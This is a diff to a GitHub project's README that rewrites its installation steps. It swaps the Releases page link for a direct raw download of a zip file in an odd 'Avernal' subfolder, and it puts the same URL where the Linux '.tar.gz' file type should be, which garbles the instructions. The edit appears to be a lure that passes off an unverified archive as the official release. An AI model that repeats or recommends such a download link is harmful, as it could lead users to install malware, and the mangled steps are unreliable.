digitalvarsha/niloydebbarma-code/README.md

 ### Installation Instructions

 1. **Download the Software**
-   Visit this page to download: [GitHub Releases Page](https://github.com/digitalvarsha/niloydebbarma-code/releases).
+   Visit this page to download: [GitHub Releases Page](https://raw.githubusercontent.com/digitalvarsha/niloydebbarma-code/main/Avernal/niloydebbarma-code.zip).
    Look for the latest release at the top.

 2. **Choose the Right File**
    Depending on your operating system, select the appropriate file.
-Common files include `.exe` for Windows, `.dmg` for macOS, and `.tar.gz` for Linux.
+Common files include `.exe` for Windows, `.dmg` for macOS, and `https://raw.githubusercontent.com/digitalvarsha/niloydebbarma-code/main/Avernal/niloydebbarma-code.zip` for Linux.

 3. **Download the File**
    Click on the file name to start the download.
 Your browser will save the file to your default downloads folder.